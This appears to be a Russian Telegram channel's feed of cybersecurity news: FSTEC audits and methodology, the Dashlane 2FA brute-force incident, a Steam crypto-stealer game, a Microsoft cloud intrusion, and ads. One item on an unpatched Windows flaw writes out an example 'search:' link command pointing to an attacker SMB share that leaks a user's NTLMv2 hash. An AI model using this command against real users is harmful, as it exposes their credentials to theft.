5684
Новости связанные с Федеральной службой по техническому и экспортному контролю (ФСТЭК России) Неофициальный канал. По всем вопросам: @GovInfoBot Купить рекламу: https://telega.in/c/fstecru
Менеджер паролей Dashlane сообщил о взломе: хакеры получили зашифрованные хранилища пользователей
8 июня. / securitylab.ru /. Даже один короткий код из шести цифр может стать целью масштабной атаки, если злоумышленники находят способ перебирать такие комбинации автоматически.
Dashlane сообщил о попытке взломать часть пользовательских учётных записей. Атака началась 31 мая 2026 года и была направлена на механизм, позволяющий добавлять новые устройства к уже существующим аккаунтам. Злоумышленники пытались подобрать одноразовые коды подтверждения, чтобы зарегистрировать свои устройства и получить копии зашифрованных хранилищ паролей.
По данным компании, защитные системы сработали автоматически и временно заблокировали учётные записи, по которым шло большое число попыток входа. Из-за этого многие пользователи на время потеряли доступ к сервису, но позже Dashlane восстановил заблокированные аккаунты.
Несмотря на блокировки, атакующим удалось подобрать действительные коды менее чем для 20 пользователей личных тарифов. После этого злоумышленники зарегистрировали новые устройства в этих учётных записях и скачали копии зашифрованных хранилищ. Dashlane отдельно уведомил всех затронутых пользователей. Компания подчёркивает, что если клиент не получил специальное письмо о риске для хранилища, его аккаунт не пострадал.
Содержимое хранилища нельзя открыть без мастер-пароля. Dashlane заявляет, что не хранит мастер-пароли и их производные на своих серверах, поскольку сервис построен по модели «нулевого знания». Для защиты хранилищ используются Argon2, AES-256-CBC и HMAC-SHA256, поэтому получить доступ к данным без мастер-пароля компания считает крайне маловероятным даже при длительных попытках.
Внутренние системы Dashlane, как показало расследование, не пострадали. Компания завершила проверку 4 июня 2026 года и не нашла признаков дополнительного ущерба для клиентов или инфраструктуры сервиса.
ФСТЭК обновила правила поиска уязвимостей и скрытых возможностей в ПО
5 июня. / anti-malware.ru /. ФСТЭК России утвердила новую методику выявления уязвимостей и недекларированных возможностей в программном обеспечении. Проще говоря, регулятор обновил правила, по которым будут искать дыры, ошибки и потенциально опасные функции в софте, проходящем сертификацию.
Новый документ предназначен прежде всего для испытательных лабораторий и разработчиков, которые участвуют в сертификации средств защиты информации, защищённого программного обеспечения и программно-аппаратных комплексов. Методика будет применяться как при первичной сертификации продуктов, так и при внесении изменений в уже сертифицированные решения.
Особое внимание документ уделяет разработчикам средств защиты информации. Им рекомендуют использовать положения новой методики для выстраивания внутренних процессов безопасной разработки программного обеспечения в соответствии с требованиями ГОСТ Р 56939-2024. Фактически речь идёт о том, чтобы искать потенциальные проблемы не только на финальном этапе испытаний, но и на протяжении всего жизненного цикла продукта. При этом ФСТЭК официально отправила на пенсию предыдущую версию документа.
Методика выявления уязвимостей и недекларированных возможностей, утверждённая ещё 25 декабря 2020 года, больше не применяется. Для рынка информационной безопасности это не просто бюрократическое обновление.
Методики ФСТЭК напрямую влияют на то, как проходят сертификацию российские средства защиты информации, какие проверки проводят лаборатории и какие требования предъявляются к разработчикам. А учитывая, что количество уязвимостей в программном обеспечении продолжает расти, а требования к безопасной разработке становятся всё жёстче, обновление правил игры было лишь вопросом времени.
Так что разработчикам защищённого ПО, испытательным лабораториям и ИБ-подразделениям теперь придётся сверяться уже с новым набором требований. Старые инструкции официально ушли в архив.
📲 Подписывайтесь на наш канал в МАХ!
🔸ВС России может признать экстремистскими хакеров, которым приписывают атаку на «Аэрофлот»
5 июня. / securitylab.ru /. Верховный суд России рассмотрит дело о запрете двух хакерских группировок, которым приписывают атаки на российские и белорусские государственные структуры, транспортные системы и крупные IT-базы. Заседание пройдет в закрытом режиме 21 июля, сообщил РБК.
Административный иск подан против «Киберпартизан BY» и Silent Crow. Пресс-служба Верховного суда сообщила, что иск уже приняли к производству. Заявитель просит признать группировки экстремистскими организациями и запретить деятельность на территории России.
«Киберпартизан BY» и Silent Crow связывали с атаками на критическую инфраструктуру, государственные учреждения и крупные компании России и Белоруссии. Среди возможных целей назывались IT-инфраструктура «Аэрофлота», базы «Ростелекома», Росреестр и серверы Белорусской железной дороги.
«Киберпартизаны BY» появились в сентябре 2020 года как белорусская децентрализованная группа анонимных хакеров-активистов. Silent Crow стала известна позже, группа действует с января 2025 года. После начала работы «Киберпартизан BY» связывали с несколькими крупными киберинцидентами в Белоруссии.
ФСТЭК обнаружила 29 тыс. неучтенных IP-адресов в приграничных регионах
4 июня. / РБК /. Федеральная служба по техническому и экспортному контролю (ФСТЭК) выявила 29 тыс. неиспользуемых IP-адресов в организациях приграничных регионов. Владельцы не знали об их существовании, при этом такие адреса создавали дополнительные риски для кибератак. Об этом на Петербургском международном экономическом форуме рассказал заместитель директора ФСТЭК Виталий Лютиков.
По словам Лютикова, ФСТЭК проверила внешний контур организаций в приграничных территориях.
«По итогам 29 тыс. IP-адресов вообще были не задействованы. Они были заблокированы безболезненно организациями. Они не знали, что это за IP, зачем они, а это колоссальная поверхность атаки», — сказал он.
Также ведомство проанализировало состояние кибербезопасности 4,5–5 тыс. организаций госсектора и объектов критической информационной инфраструктуры. По данным ФСТЭК, у 54% проверенных организаций сохраняются критические уязвимости, 69% не используют двухфакторную аутентификацию для привилегированных пользователей, а у 42% обнаружены пароли по умолчанию.
«Это очень колоссальные цифры. Прошло более четырех лет, а мы руки мыть не научились», — отметил Лютиков.
Одной из главных причин проблем он назвал отсутствие инвентаризации IT-активов и слабое взаимодействие между IT-подразделениями и службами информационной безопасности.
Лютиков также отметил, что на защищенность организаций влияет использование зарубежного ПО и оборудования. По его словам, полностью отказаться от иностранных решений российские компании пока не могут.
Android научится распознавать поддельные звонки: Google берется за дипфейк-мошенников
4 июня. / Кибер Медиа /. Google представила для Android функцию fake call detection, которая предупреждает пользователей о звонках с подменой номера и ИИ-клонированием голоса. Защита рассчитана на случаи, когда мошенник звонит якобы от имени знакомого человека, родственника или коллеги и пытается выманить деньги или данные.
Функция работает в Phone by Google и включена по умолчанию. Если звонит контакт, устройства обмениваются скрытым подтверждающим сигналом в реальном времени. Google называет это «цифровым рукопожатием»: если звонок действительно идет с устройства контакта, проверка проходит штатно.
Если злоумышленник подменяет номер, первичного сигнала не будет. Тогда смартфон дополнительно обращается к настоящему устройству контакта. Если оно подтверждает, что звонок сейчас не совершается, пользователь увидит предупреждение с рекомендацией завершить разговор. Механизм построен на RCS с end-to-end-шифрованием, поэтому проверка выполняется приватно.
Google связывает запуск с ростом мошенничества, где совмещаются два приема: spoofing номера и генерация голоса через ИИ. Caller ID в такой схеме уже не помогает: на экране может отображаться знакомый контакт, а голос может быть похож на реального человека.
Fake call detection начнут разворачивать по всему миру в июне 2026 года для устройств на Android 12 и новее. Первыми функцию получат Pixel. Для работы нужны Phone by Google, Contacts, Google Messages, поддержка RCS и использование Phone by Google у обеих сторон звонка.
📲 Подписывайтесь на наш канал в МАХ!
📚Хакеры со всего мира съедутся в Москву — а F6 будет держать оборону на Standoff 17
27 мая. / securitylab.ru /. F6 примет участие в Standoff 17 как технологический партнер и войдет в состав синей команды. На соревнованиях специалисты компании будут защищать ИТ-сектор виртуального государства от атак красных команд.
Международная кибербитва пройдет с 16 по 19 июня в московском Кибердоме. Организатором выступает Positive Technologies. Формат Standoff строится вокруг практического противостояния: атакующие команды ищут слабые места в инфраструктуре, защитники фиксируют инциденты, анализируют действия противника и пытаются сохранить работоспособность систем.
В 2026 году виртуальное государство включает семь отраслей: железнодорожный транспорт, ритейл, энергетику, горно-металлургическую промышленность, ИТ-сектор, телекоммуникации и банки. F6 будет работать с инфраструктурой ИТ-сегмента.
В Standoff 17 заявлены 25 красных команд из Вьетнама, Индонезии, Китая, Монголии, Нидерландов, Узбекистана и России. Синие команды представят российские специалисты по информационной безопасности. Защитникам предоставят средства разных вендоров для мониторинга и реагирования на инциденты.
Директор по продуктам платформы Standoff 365 Иван Булавин сообщил, что площадка позволяет проверять технологии в инфраструктуре кибербитвы, а не на демонстрационном стенде. По словам Булавина, участникам приходится работать с потоком инцидентов и быстро принимать решения.
Технический директор F6 Никита Кислицин отметил, что специалисты компании занимаются расследованием инцидентов и защитой клиентов от атак, но большая часть работы обычно остается вне публичного поля. По словам Кислицина, Standoff дает возможность проверить подходы компании в практическом формате.
Кроме кибербитвы, организаторы проведут деловую программу. В расписании заявлены доклады о кибериспытаниях, цифровых копиях систем и применении искусственного интеллекта в информационной безопасности. Также запланированы конкурсы, мастер-классы и зоны отдыха.
Через криптообменники вывели 295 млрд рублей, украденных у россиян и бизнеса
27 мая. / Кибер Медиа /. Криптовалюта стала одним из основных каналов вывода похищенных у россиян и отечественного бизнеса денег за границу. По оценкам специалистов, в 2025 году киберпреступники вывели через криптообменники 295 млрд рублей украденных средств. Об этом на Международном форуме по безопасности сообщил заместитель председателя правления Сбербанка Станислав Кузнецов.
По данным экспертов отрасли, в России работает более 900 организаций, которые обменивают криптовалюту и переводят ее за рубеж. Такие сервисы действуют онлайн, офлайн и в теневом сегменте интернета. Именно сочетание анонимности, слабого контроля и трансграничности делает криптовалютную инфраструктуру привлекательной для злоумышленников.
Кузнецов отметил, что речь идет о деньгах, похищенных в результате обмана граждан, атак на компании и преступлений против юридических лиц. По его словам, около 300 млрд рублей, или около $4 млрд, выводятся из России с использованием криптовалют и криптообменников.
Аналитики считают, что криптовалютный рынок нужно регулировать сбалансированно: с одной стороны, он используется для отмывания преступных доходов, финансирования организованной преступности и вывода денег за рубеж, с другой - остается удобным инструментом расчетов для легального бизнеса. Поэтому задача государства - не просто запретить оборот, а создать систему управления рисками.
По оценке Кузнецова, Россия находится на этапе перехода от «дикого» рынка криптовалюты к более прозрачной модели. Он связал это с законопроектом «О цифровой валюте и цифровых правах», который прошел первое чтение в Госдуме. В основе предлагаемых мер - регистрация или лицензирование участников крипторынка.
Для финансовой безопасности это принципиальный вопрос: чем жестче банки и традиционные платежные инструменты закрывают мошеннические каналы, тем активнее преступники уходят в теневой криптосегмент. Без понятных правил для обменников и трансграничных переводов криптовалюта остается для них удобным способом быстро вывести украденные средства из зоны контроля.
📲 Подписывайтесь на наш канал в МАХ!
Телеграм канал AI для бизнеса
AI - не будущее. Это настоящее вашего бизнеса.
Телеграм-канал "AI для бизнеса" знает все о внедрении и использовании искусственного интеллекта в бизнесе в России и мира. Только со своими подписчиками канал делится:
- как внедрить искусственный интеллект в реальные бизнес-процессы,
- разборами кейсов: как компании сократили затраты на 30-50% с помощью AI,
- лайфхаками по автоматизации рутинных задач,
- новостями мира AI и разборами трендов.
Сами давно читаем и вам советуем подписаться.
Подписаться
#реклама 16+
О рекламодателе
Steam снова стал витриной для вредоноса: игра украла у пользователей более $150 тыс.
25 мая. / Кибер Медиа /. Valve удалила из Steam бесплатную 2D-игру BlockBlasters после того, как в ней обнаружили криптостилер. Вредонос был встроен в обновление игры и использовался для кражи криптовалюты у пользователей. По данным The Verge, общий ущерб превысил $150 тыс., а среди пострадавших оказался стример Raivo Plavnieks, который собирал деньги на лечение рака и потерял около $32 тыс.
BlockBlasters появилась в Steam в июле и изначально не выглядела подозрительно. По данным Tom’s Hardware, вредоносный компонент добавили позднее - через обновление от 30 августа. Это позволило игре почти месяц оставаться в магазине уже в зараженном виде, пока инцидент со стримером не привлек внимание исследователей.
Злоумышленники действовали не только через саму страницу Steam. Malware-трекер vx-underground сообщал, что атакующие целились в стримеров и предлагали им продвигать игру за оплату. Такой сценарий делал атаку более убедительной: жертва видела игру в официальном магазине, а предложение выглядело как обычная рекламная интеграция.
После разбирательства выяснилось, что BlockBlasters - не единственный подобный случай. ФБР ранее собирало информацию от пользователей Steam, которые могли пострадать от вредоносных игр, включая BlockBlasters, Chemia, Dashverse/DashFPS, Lampy, Lunara, PirateFI и Tokenova. Эти игры, по данным PC Gamer, использовались в период с мая 2024 года по январь 2026-го.
Главный риск таких атак в доверии к площадке. Пользователь скачивает игру не с пиратского сайта, а из официального магазина, где есть отзывы, страница разработчика и привычный интерфейс Steam. Но если вредонос можно доставить через обновление уже опубликованной игры, модерация при релизе не защищает от последующей подмены. Для игроков это означает, что даже бесплатная игра из крупного магазина может быть каналом кражи сессий, паролей и криптокошельков.
Юбка Kimmy (Тёмно-синий)
Успейте заказать!
Узнать больше
#реклама
voluminous.shop
О рекламодателе
Обзор кибератак и уязвимостей за прошедшую неделю: 18 - 22 мая 2026 года
24 мая. / Кибер Медиа /. Редакция Кибер Медиа отобрала ключевые события этой недели из мира кибербезопасности. На этот раз в фокусе оказались сразу несколько разных сценариев цифрового риска: бывшие IT-сотрудники уничтожили десятки баз данных правительства США после увольнения, Интерпол провел масштабную операцию против кибермошенников в 13 странах, GitHub признал компрометацию внутреннего контура через вредоносное расширение для VS Code, ИИ-система Pizza Hut стала предметом иска на $100 млн, а исследователи показали вредонос Fast16, который мог использоваться не для кражи данных, а для саботажа инженерных расчетов в ядерной сфере.
Уволенные айтишники стерли 96 баз данных правительства США
Федеральный суд присяжных в США признал 34-летнего Сохаиба Ахтера виновным по делу об удалении правительственных баз данных после увольнения из IT-компании. По данным Минюста США, Ахтер и его брат-близнец Муниб работали в компании, которая предоставляла софт и услуги более чем 45 федеральным ведомствам. После увольнения они получили несанкционированный доступ к системам работодателя и удалили около 96 баз данных с информацией госзаказчиков.
Операция Ramz ударила по кибермошенникам сразу в 13 странах
Интерпол сообщил о 201 задержании по итогам операции Ramz - первой кибероперации такого масштаба в регионе Ближнего Востока и Северной Африки. В ней участвовали 13 стран, а целью были фишинговые сервисы, вредоносная инфраструктура и кибермошеннические схемы. Помимо задержанных, правоохранители установили еще 382 подозреваемых, выявили 3867 жертв и изъяли 53 сервера.
В GitHub признали факт взлома платформы
GitHub подтвердил инцидент с несанкционированным доступом к внутренним репозиториям компании. По данным СМИ, злоумышленники получили доступ примерно к 3,8 тыс. закрытых внутренних репозиториев после заражения рабочего устройства сотрудника через вредоносное расширение для Visual Studio Code. Компания заявила, что не видит признаков компрометации пользовательских проектов, организаций, enterprise-аккаунтов или клиентских репозиториев за пределами внутреннего контура GitHub.
ИИ-оптимизация Pizza Hut дошла до суда и претензий на $100 млн
Владелец Chaac Pizza Northeast, управляющий более чем 110 ресторанами Pizza Hut в США, подал иск к Yum Brands из-за обязательного внедрения ИИ-системы Dragontail. По версии франчайзи, технология должна была ускорить приготовление и доставку заказов, но в реальности замедлила работу кухонь, ухудшила доставку и привела к убыткам более чем на $100 млн. История показывает риск принудительного внедрения ИИ в процессы, где ошибка алгоритма сразу превращается в операционный ущерб.
Взрывной код: вирус Fast16 создавался для диверсий в ядерной сфере
Исследователи Symantec и Carbon Black разобрали Fast16 - саботажный фреймворк, компоненты которого датируются примерно 2005 годом. По их оценке, вредонос был создан для подмены результатов инженерных симуляций, связанных с высоковзрывными процессами и сжатием урана, то есть с расчетами, важными для проектирования ядерного оружия. В отличие от Stuxnet, который воздействовал на физический процесс, Fast16 атаковал доверие к вычислениям: ученые и инженеры могли видеть согласованные, но неверные результаты моделирования.
"Анонимный" VPN для вымогателей ликвидирован. First VPN Service отключили правоохранители
22 мая. / securitylab.ru /. Федеральное бюро расследований США вместе с европейскими правоохранительными органами отключило инфраструктуру анонимного сервиса First VPN Service, которым годами пользовались операторы программ-вымогателей и другие киберпреступники. Через сеть сервиса атаковали как минимум 25 вымогательских группировок, включая Avaddon.
First VPN Service работал примерно с 2014 года и предлагал клиентам 32 узла в 27 странах. Пользователи могли оплачивать подписку криптовалютой и выбирать сразу несколько промежуточных серверов, чтобы усилить анонимность. Сервис поддерживал OpenConnect, WireGuard, OpenVPN и другие протоколы, а также маскировал трафик под обычные HTTPS-соединения. Для связи использовали Jabber, Telegram и даже ICQ.
В отчете ФБР говорится, что инфраструктуру First VPN Service использовали для разведки сетей, взломов, перебора паролей, DDoS-атак и сокрытия источника вредоносного трафика. Адреса сервиса также связывают с ботнетами, мошенническими схемами и сканированием открытых сервисов в интернете.
Сервис активно рекламировали на теневых форумах Exploit[.]in и XSS[.]is, где продают доступы к взломанным системам, украденные данные и инструменты для атак. ФБР отдельно подчеркнуло, что предупреждение касается только First VPN Service и не относится к другим VPN-провайдерам с похожими названиями.
Операцию по отключению инфраструктуры провели совместно с французским подразделением по борьбе с киберпреступностью BL2C и Национальным подразделением по борьбе с высокотехнологичными преступлениями полиции Нидерландов. Помощь также оказали Украина, Великобритания, Швейцария и Люксембург.
В документе перечислены десятки IP-адресов и доменов сервиса, включая 1vpns[.]com, 1vpns[.]org и 1jabber[.]com. ФБР советует компаниям блокировать известную инфраструктуру First VPN Service, внимательнее отслеживать подключения через VPN и усилить защиту удаленного доступа с помощью многофакторной аутентификации.
📝 ФСТЭК России возглавит первый замдиректора службы Виталий Лютиков, рассказали «Ведомостям» три источника из кибербез-компаний.
Двое собеседников назвали решение «давно ожидаемым». Один из них добавил, что «этот процесс не быстрый», так как служба находится в ведении министерства обороны.
🔴С 2011 года пост директора ФСТЭК занимает Владимир Селин. Виталий Лютиков пришел в службу в 2005 году. С 2016 по 2024 год он был заместителем директора ФСТЭК, а в 2024-м его назначили первым замдиректора.
📰 Max | Telegram | Рассылка | Приложение для iOS | Android
Один скомпрометированный аккаунт открыл атакующим почти всё облако
21 мая. / Кибер Медиа /. Microsoft раскрыла атаку Storm-2949, в которой компрометация нескольких облачных учетных записей быстро переросла в масштабный инцидент в Microsoft 365 и Azure. Злоумышленники похищали данные из OneDrive, SharePoint, Azure Storage, SQL-баз, Key Vault и производственных cloud-сред, используя не классическое вредоносное ПО, а легитимные функции управления облаком.
Первичный доступ, по оценке Microsoft, был получен через социальную инженерию и злоупотребление Self-Service Password Reset. Атакующие инициировали сброс пароля от имени жертвы, убеждали пользователя подтвердить MFA-запрос, затем меняли пароль, удаляли старые методы аутентификации и регистрировали Microsoft Authenticator на своем устройстве. Так они сохраняли доступ и блокировали законного владельца аккаунта.
После этого Storm-2949 проводила разведку через Microsoft Graph API, искала пользователей, приложения и сервисные учетные записи, а затем расширяла доступ за счет новых скомпрометированных аккаунтов. В Microsoft 365 атакующие скачивали тысячи файлов из OneDrive и SharePoint, включая документы по VPN-конфигурациям и процедурам удаленного доступа.
В Azure злоумышленники использовали привилегированные RBAC-роли, чтобы добраться до App Service, Key Vault, Storage и SQL. Они извлекали publishing profiles для веб-приложений, меняли настройки доступа к Key Vault, получали секреты, включая connection strings и учетные данные, а затем использовали их для доступа к производственным приложениям и базам данных.
Для работы с виртуальными машинами Storm-2949 злоупотребляла административными функциями Azure, включая Run Command и VMAccess extension. Через них атакующие создавали локальные админ-аккаунты, запускали PowerShell-скрипты, пытались ослабить Microsoft Defender и устанавливали ScreenConnect для удаленного доступа. Позже этот инструмент использовали для разведки, поиска учетных данных и сбора файлов с приватными ключами.
Главный вывод Microsoft: в облачных атаках компрометированная личность становится опаснее зараженного устройства. Если у пользователя есть лишние привилегии, атакующему не обязательно «ломать» серверы напрямую - он может использовать штатные панели, API, расширения и ключи так, будто выполняет обычные административные операции. Для защиты нужны не только MFA, но и phishing-resistant MFA для привилегированных аккаунтов, Conditional Access, минимальные права, мониторинг действий в Entra ID, Azure, Microsoft 365 и быстрый контроль подозрительных изменений в Key Vault, Storage, SQL и VM.
Киберстрахование начнут с тех, у кого проще посчитать ущерб
20 мая. / Кибер Медиа /. В России программы киберстрахования в первую очередь могут появиться в банках и финансовом секторе. По словам замглавы Минцифры Александра Шойтова, именно в этих отраслях риски проще оценить и перевести в понятную денежную модель. После накопления практики к страхованию киберрисков смогут подключаться и другие сферы.
Шойтов отметил, что страховщики и специалисты по информационной безопасности в целом уже готовы к запуску таких механизмов. Также, по его словам, подготовлено документационное обеспечение необходимых процедур. Главная задача сейчас - набрать практику, чтобы страховые продукты работали не формально, а покрывали реальные сценарии ущерба от киберинцидентов.
Во втором эшелоне могут оказаться оборонно-промышленный комплекс и отрасли, связанные с национальной безопасностью. Ранее в Совете Федерации уже обсуждали обязательное страхование киберрисков для объектов критической информационной инфраструктуры.
Главные препятствия для развития киберстрахования пока остаются прежними: низкие лимиты по договорам, которые не всегда покрывают возможный ущерб, и высокая стоимость полисов даже с учетом франшиз. Для бизнеса это означает, что киберстрахование может стать дополнительным инструментом управления рисками, но не заменой базовой защиты, мониторинга, резервного копирования и плана реагирования на инциденты.
Обзор кибератак и уязвимостей за прошедшую неделю: 1 - 5 июня 2026 года
7 июня. / КИБЕР МЕДИА /. Редакция Кибер Медиа собрала для вас главные события этой недели из мира кибербезопасности. В дайджест вошли пять событий: мошенники использовали ожидание GTA 6 для распространения вредоносов и фишинга, число атак на бухгалтерию через ЭДО и деловую переписку превысило уровень прошлого года, новый троянец Argamal начал распространяться через игры 18+, хакеры взломали сервис читов Atlas Menu, а группировка TA4922 расширила атаки за пределы Восточной Азии.
Хайп вокруг GTA 6 стал приманкой для вредоносов
Злоумышленники используют ожидание GTA 6, чтобы распространять вредоносные файлы, фейковые beta-ключи и фишинговые страницы. Под ударом прежде всего пользователи Windows, Android и владельцы аккаунтов Rockstar Social Club.
Число атак на бухгалтерию через системы ЭДО и деловую переписку превысило уровень прошлого года
Российский бизнес продолжает подвергаться кибератакам через системы электронного документооборота (ЭДО) и деловую переписку. За первые пять месяцев 2026 года корпоративные пользователи уже столкнулись с 13 тысячами подобных атак*. Это больше, чем за весь 2025 год. В зоне риска находятся организации, через которые проходят значительные финансовые потоки и большое количество платежей.
Опасный троянец прячется в играх 18+ и даёт злоумышленникам полный контроль над устройством
Весной 2026 года эксперты обнаружили новую вредоносную кампанию, в рамках которой злоумышленники распространяли ранее неизвестный троянец удалённого доступа Argamal под видом игр 18+. Вредоносное ПО было обнаружено на устройствах сотен пользователей в России, Бразилии, Германии, Вьетнаме и других странах.
«Доигрались»: хакеры взломали сервис, продающий читы для игр
Хакеры взломали сервис Atlas Menu, специализировавшийся на продаже читов для Grand Theft Auto V. В результате в сети оказались данные десятков тысяч пользователей платформы. Эксперт «Группы Астра» Андрей Кузнецов рассказал, что необходимо предпринять для предотвращения подобных инцидентов.
Китайская кибергруппа вышла за пределы Азии и начала глобальные атаки
Исследователи сообщили о резком расширении активности группировки TA4922, которую связывают с китайским киберкриминалом. Если ранее злоумышленники в основном атаковали организации в Восточной Азии, то теперь их кампании зафиксированы в Великобритании, Германии, Италии, Южной Африке и других странах.
ФСТЭК утвердила методику выявления уязвимостей и недекларированных возможностей в ПО
05 июня. / d-russia.ru /. Утверждена методика выявления уязвимостей и недекларированных возможностей в программном обеспечении, сообщила ФСТЭК.
Методика ориентирована на проведение исследований, выполняемых испытательными лабораториями и разработчиками в рамках сертификационных испытаний программных, программно-аппаратных средств защиты информации и защищённых программных, программно-технических средств, а также в рамках внесения изменений в ранее сертифицированные средства. Разработчикам ПО средств защиты информации рекомендуется использовать положения методики для организации внутренних процессов жизненного цикла ПО в соответствии с ГОСТ Р 56939-2024 «Защита информации. Разработка безопасного программного обеспечения. Общие требования».
«Методика выявления уязвимостей и недекларированных возможностей в программном обеспечении», утверждённая ФСТЭК России 25 декабря 2020 года, теперь не применяется.
📲 Подписывайтесь на наш канал в МАХ!
ФСТЭК: больше половины организаций КИИ имеют критические уязвимости
04 июня. / d-russia.ru /. У 54% проверенных ведомством организаций критической информационной инфраструктуры (КИИ) сохраняются критические уязвимости, 69% не используют двухфакторную аутентификацию для привилегированных пользователей, а у 42% обнаружено использование паролей, назначаемых по умолчанию, сообщил на Петербургском международном экономическом форуме в четверг заместитель директора ФСТЭК Виталий Лютиков.
Всего было проверено порядка пяти тысяч организаций.
На защищённость организаций, в частности, негативно влияет использование зарубежного ПО и оборудования. Это связано с незрелостью российских решений. Продолжают унаследовано использоваться продукты Cisco, VMware, Fortinet, которые уже не получают обновлений.
Также среди проблем названо отсутствие инвентаризации IT-активов, слабое взаимодействие между IT-подразделениями и службами информационной безопасности, отсутствие требований к ИБ подрядных организаций.
В январе ФСТЭК заявляла, что количество «минимально защищённых» субъектов КИИ за год выросло с 13% до 36%.
📲 Подписывайтесь на наш канал в МАХ!
🔹Один клик — и пароль у хакера. Новая уязвимость Windows передаёт данные пользователя злоумышленнику без вирусов
4 июня. / securitylab.ru /. Новая атака работает даже при включённом Защитнике.
Один клик по ссылке в Windows может оказаться достаточным, чтобы компьютер сам передал злоумышленнику данные для атаки. Проблема связана не с вредоносной программой и не со сложной цепочкой взлома, а с обычным обработчиком ссылок, который встроен в систему.
Специалисты Huntress раскрыли детали неисправленной проблемы, через которую атакующий может получить NTLMv2-хеш пользователя. Новый вариант похож на CVE-2026-33829, уязвимость в приложении Windows «Ножницы», которую Microsoft исправила в апреле 2026 года.
CVE-2026-33829 CVSS:3.1/AV:N/AC:L/Au:N/C:P/I:N/A:N — 5.0 (Medium) затрагивала обработчик ms-screensketch: и позволяла раскрыть чувствительные данные постороннему человеку. Как описывает Microsoft, атакующий мог убедить пользователя перейти по специально подготовленной ссылке в браузере, на веб-странице или в письме. После того как пользователь соглашался запустить такую ссылку, компьютер подключался к SMB-серверу злоумышленника и раскрывал NTLMv2-хеш, который затем можно было использовать для входа от имени жертвы.
Причина прежней уязвимости заключалась в том, что обработчик ссылок в «Ножницах» принимал параметр filePath, но не проверял переданный путь. Если в параметр попадал сетевой путь UNC, Windows обращалась к указанному ресурсу и запускала NTLM-аутентификацию. В результате атакующий мог получить Net-NTLMv2-хеш пользователя.
Новая проблема приводит к тому же результату, но использует другой обработчик. Вместо ms-screensketch: и параметра filePath применяется схема search: и параметр crumb=location:. Пример такой команды выглядит так: start "" "search=test&crumb=location:\10.0.1.100\share". По словам специалиста Huntress Эндрю Шварца, механизм утечки NTLM, результат, условия атаки и умеренная оценка опасности совпадают с уже исправленной уязвимостью.
Проблему удалось воспроизвести на Windows 11 25H2 Pro. В тесте использовалась обычная учётная запись без прав администратора, с включённой защитой Microsoft Defender по умолчанию. На стороне атакующего работал сервер с инструментом Responder, который сразу получил данные пользователя после запуска ссылки search: с параметром crumb=location: и сетевым путём SMB.
🔸Dashlane заблокировал часть аккаунтов после атаки на 2FA
3 июня. / Кибер Медиа /. Пользователи менеджера паролей Dashlane столкнулись с временными блокировками аккаунтов после брутфорс-атаки на двухфакторную аутентификацию. Внешний злоумышленник пытался зарегистрировать новые устройства в отдельных учетных записях, перебирая 2FA-коды.
Из-за большого числа попыток входа встроенные механизмы защиты Dashlane автоматически заблокировали затронутые аккаунты. Часть пользователей также получила уведомления о приостановке доступа и сообщала о проблемах с входом после сброса мастер-пароля.
Dashlane заявляет, что признаков компрометации внутренних систем компании не обнаружено. Заблокированные аккаунты, по данным сервиса, уже восстановлены.
При этом атака все же привела к ограниченному инциденту: злоумышленникам удалось скачать копии зашифрованных хранилищ менее чем 20 пользователей персональных тарифов. Компания утверждает, что эти клиенты были уведомлены напрямую, а доступ к содержимому хранилищ невозможен без мастер-пароля.
Dashlane рекомендует пользователям проверить список привязанных устройств, удалить неизвестные устройства и включить 2FA, если она еще не активирована. Компания продолжает мониторинг и обещает обновлять информацию по мере расследования.
Высшее образование онлайн — поменяйте жизнь в 2026 году!
✅Идёт набор: от 7500 ₽/мес.*
Московский технологический институт предлагает:
— Высшее образование в московском вузе без выезда на сессии
— Полностью дистанционный онлайн-формат
— Возможность обучаться дома, на работе, в путешествии
— Диплом государственного образца
— Более 60 направлений на выбор (IT, инженерные, экономические, педагогические, управленческие и другие)
— 5 способов оплаты обучения
— Поддержка персонального куратора: от поступления до получения диплома
Узнать больше
#реклама 16+
mti-vuz.ru
О рекламодателе
📚„Интернет надо заслужить“. Александр Дугин предложил выдавать россиянам доступ к сети за хорошее поведение
26 мая. / securitylab.ru /. Философ, политолог и социолог Александр Дугин предложил выдавать россиянам доступ к интернету порционно и «за хорошее поведение». Об этом он заявил в интервью журналистке Ксении Собчак, опубликованном на ее YouTube-канале.
«Можно вот его выдавать порционно за хорошее поведение, например. Интернетом надо научиться пользоваться. До него надо дорасти, его надо заслужить», сказал Дугин.
Он также высказался о сбоях в работе Telegram. Дугин заявил, что после начала «глушения» мессенджера люди стали выходить на улицу.
«Как только стали глушить Telegram, люди уже ходят и что-то кричат, кто-то уже свистит на даче там или в городе. И мне это напомнило нормальную жизнь, когда люди жили, жили на улице, жили друг с другом общением», сказал он.
Антивирус можно обмануть не скрытностью, а слишком большим количеством данных
26 мая. / КИБЕР МЕДИА /. Исследователи описали новый класс атак на антивирусы, EDR и песочницы - Telemetry Complexity Attacks. Идея не в том, чтобы отключить защиту или спрятаться от сенсоров, а в том, чтобы перегрузить цепочку обработки телеметрии: сборщики событий, сериализаторы, базы данных и интерфейсы аналитиков. В результате вредоносная активность выполняется, но может не попасть в отчет или не отобразиться специалисту.
Метод строится на генерации специально подготовленной телеметрии. Программа рекурсивно создает дочерние процессы и формирует глубоко вложенные или слишком крупные структуры данных. Такие события давят на ограничения JSON/BSON, глубину вложенности, размер записей, сериализацию, хранение и визуализацию. Защитный агент может продолжать работать, но дальнейшая обработка данных начинает ломаться.
Авторы проверили подход на 12 коммерческих и open-source-решениях для анализа вредоносного ПО и endpoint detection and response. Семь продуктов дали сбой на разных стадиях телеметрического пайплайна: где-то отчеты обрезались, где-то записи не попадали в базу, где-то возникали ошибки сериализации, а где-то зависали панели аналитиков.
В двух случаях поставщики присвоили уязвимостям CVE - CVE-2025-61301 и CVE-2025-61303. Другие вендоры выпустили патчи или изменили конфигурации. Это показывает, что проблема не сводится к одному продукту: слабым местом может быть сама архитектура сбора и обработки данных безопасности.
Для защитников это неприятный сценарий. Многие системы строятся на предположении, что если сенсор увидел активность, она попадет в отчет и будет доступна аналитику. Telemetry Complexity Attacks ломают именно этот участок: данные формально собираются, но затем теряются, отбрасываются или становятся нечитаемыми. Значит, защищать нужно не только endpoint-агент, но и весь путь телеметрии - от сбора событий до базы, очередей, сериализации и интерфейса расследования.
📚Дарёному значку в чип смотрят: Песков призвал не доверять электронным сувенирам
25 мая. / securitylab.ru /. Кремль прокомментировал отказ американцев от подарков, полученных в Китае.
